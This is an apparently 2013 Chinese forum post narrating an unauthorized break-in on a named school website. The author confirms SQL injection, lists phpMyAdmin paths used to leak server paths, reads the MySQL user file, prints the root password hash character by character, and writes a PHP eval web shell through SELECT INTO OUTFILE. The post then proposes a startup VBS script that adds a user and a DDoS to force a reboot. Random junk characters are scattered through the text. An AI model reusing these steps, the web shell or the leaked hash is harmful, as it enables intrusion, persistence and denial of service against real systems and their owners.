第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ {* [4 c6 ^* M' p+ K& ^* i
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
) `4 {3 r/ J# R0 {, Y t
& G2 n9 I' u8 \6 q/ m2 X. G
# j' d: k4 F0 y# Q& d
8 C. ~2 X. W, x6 c4 i0 |2 p常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 6 ] a, f% ~4 z) G4 h
7 S3 P9 J3 x* I- S3 Q
那么想可以直接写入shell ,getshell有几个条件:8 c* A1 v `& j6 a+ j3 b0 k
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 3 P; O0 ^( y: n3 Q
! x( k8 c; U' c+ h/ a试着爆绝对路径: ; z8 F6 D7 O/ C: i5 N) W
1./phpMyAdmin/index.php?lang[]=1 ' _" E1 {- S5 u, `, l
2./phpMyAdmin/phpinfo.php
( t$ q! i" q( @ {: m; B3./load_file() 6 c A7 x4 y: H$ D6 V# ~9 i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
$ b. h+ s, H: D* }5./phpmyadmin/libraries/select_lang.lib.php
- @# [* T5 \- j2 x/ t. M" J$ @6./phpmyadmin/libraries/lect_lang.lib.php
: T/ `' W# Q( L% t% x8 K7./phpmyadmin/libraries/mcrypt.lib.php / \$ p# n1 p" o3 p% ?' t* ~
8./phpmyadmin/libraries/export/xls.php
, k2 L# \2 Z$ ~2 O4 Q8 |# K7 f7 A- W9 z3 B
均不行........................... & U- m3 D+ i9 ^; Y3 ^) d& \: k$ [
( G+ d9 t @1 O9 C: s) W9 [
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php % I9 V0 F8 \2 d8 Z. a* _4 O1 k6 }
, w9 D4 k0 M T! _1 W
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
, u1 G9 x3 L: r% d+ u2 D; K6 G( p5 i) l# M, H. n
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! `: y. L/ j( e" [5 p8 x2 s6 A- a7 @5 q( W* r2 M) C
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
, }) O3 D) W: G# _! w! k. A# l+ R/ \1 G9 O
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" S. }8 l0 [3 G0 v
& X1 Z1 w: x- ?$ S$ ]+ t3 v* |http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 1 j' n6 a, y' s7 A$ C2 p+ f0 e$ L0 ~
) I1 k( F/ n ]2 r3 J9 T" ?
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 d; h" `* [3 a! `
3 G6 `) O, `' j3 A3 E成功读到root密码: / `- V. @+ I: N( r
" U; u" ~* s- S. l; Q0 n17---- r(0072)
$ G _: U V3 C6 m5 x: W18---- o(006f)
9 K* \6 O: t7 j5 W& [" p0 t19---- o(006f) " a$ K ]' [, Y" a' M: s0 O
20---- t(0074) : M1 i5 _- v2 J" O2 v) I
21---- *(002a) 0 I6 P. ^- Y! A
22---- 8(0038) - z W8 p1 \: j0 U* k! ?( B
23---- 2(0032) # M: Y$ w, T4 g/ T3 u2 h B0 V! Z
24---- E(0045) * ]( M/ q, M4 Y; G2 [- Y
25---- 1(0031) c- _' u+ }: K. q4 E7 Z( v
26---- C(0043)
4 F: Q7 q( P; L5 v+ ?& \27---- 5(0035) & F8 \! r: a1 @1 F0 z: i# h
28---- 8(0038)
5 e1 F1 U1 C9 s; C. A) |29---- 2(0032)
' l' {$ a0 }/ P. {. A30---- 8(0038) : Q! s0 k- Y7 W8 ~
31---- A(0041)
# Q' c5 F% W! F32---- 9(0039)
: ~6 T% c; E, {' u w6 H33---- B(0042) ; K* m, C) \5 Q3 r! c
34---- 5(0035) ; F1 n* [; |& ^# G! ]
35---- 4(0034) ; Q7 `5 ~6 C1 v5 C- g) t8 P
36---- 8(0038) ! ^5 \7 q5 [# p, Y# c' [# M( G
37---- 6(0036) ! |# A. H* G, w9 h6 A" [
38---- 4(0034)
* t/ v; S2 J( d! u' Q( e) |39---- 9(0039) ' h! Q3 O9 [" s
40---- 1(0031)
0 @; _8 J. x" i# T; i" y' w41---- 1(0031)
4 \ r2 `% ~5 k0 M. ~42---- 5(0035)
' G0 x: | `: k! D3 U43---- 3(0033) % A9 e: c, w8 G. M
44---- 5(0035)
0 X5 w' c, B, D3 S3 ]5 \- L45---- 9(0039)
5 t* Y5 K! O1 m46---- 8(0038) ' r/ Q5 k3 o9 m6 Z
47---- F(0046) 1 ]+ ?7 H. I* Z9 c
48---- F(0046)
% H7 t6 ]# x* F' q8 Y8 R; G' |49---- 4(0034) * Q2 S* C- e0 k5 a1 @# x/ `) a
50---- F(0046) 2 F5 i' G5 D1 M# q: ?; c1 Q
51---- 0(0030) # I* z- y0 M; K8 h+ f
52---- 3(0033)
! ]8 b& y- R2 m6 K- w# ?. I53---- 2(0032)
1 Y/ R6 z& a0 D- h! L$ v54---- A(0041)
% ?8 }- h4 L4 `7 ^55---- 4(0034)
$ l, e; w. j+ s0 P56---- A(0041) . A; k8 T! X) B+ S- e0 x1 k
57---- B(0042) + x d+ z' D* S
58---- *(0044)
, X9 Y& L8 N p% S+ D59---- *(0035) * l& M( P2 g# {, `4 w
60---- *(0041)
" B% _1 T6 A' B1 B; V# S" u61---- *0032)
# p6 G. w% d' }& Z) c; J7 l: F* d% c$ w: S7 p5 E1 q
解密后成功登陆phpmyamin
, q% P. w5 A1 T+ Q/ B ' [ I8 _6 \" X: x
- L. h$ {8 M- \8 w' a& K! q
. r/ A( r' D8 E. O
/ a( ^. F% \0 ?! Z6 J, w! _# ?# D6 g
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 5 s' Y/ ]0 d2 [
9 e$ K6 O G# Y! h$ ~" D成功执行,拿下shell,菜刀连接: `$ p" Q$ b7 K9 C6 \* M
. p: H a, A; w6 y) z
服务器不支持asp,aspx,php提权无果................... ) ]( T8 X" r" Q/ ?
5 b$ U8 ?( L# u4 \4 O但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: + _$ w# o8 q8 Z7 Q) y8 y- f0 ^: }
服务器上已经有个隐藏帐号了
1 y Y( I# r5 x1 g1 J. b' }0 A别名 administrators
@" i' N, E) C3 }注释 管理员对计算机/域有不受限制的完全访问权
) ^5 V5 D/ b6 l* a/ N, }8 J1 M8 X2 G成员
/ B) q7 r: p* h. _' q8 ^-------------------------------------------------------------------------------
& p/ o) L! C) W; ]8 O- j; nadmin+ I, v9 o/ R! s q1 Z- p- b
Administrator2 h; z+ r# G1 B% {$ c/ @
slipper$
6 d' a$ _; y5 Fsqluser4 i# z; `' J( R, a k: |+ H' {
命令成功完成。
/ C2 x0 N- i% W# j9 }2 b4 E
3 X# E- _) b1 m服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。! I) Q$ q$ c/ o% E
- P/ N* I a( Kddos服务器重启,不然就只能坐等服务器重启了............................... s, z3 r) Q( | j
: s9 U/ e; p% R" w' d. y/ r
7 m9 s: d2 N, O; b0 z, @& M
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
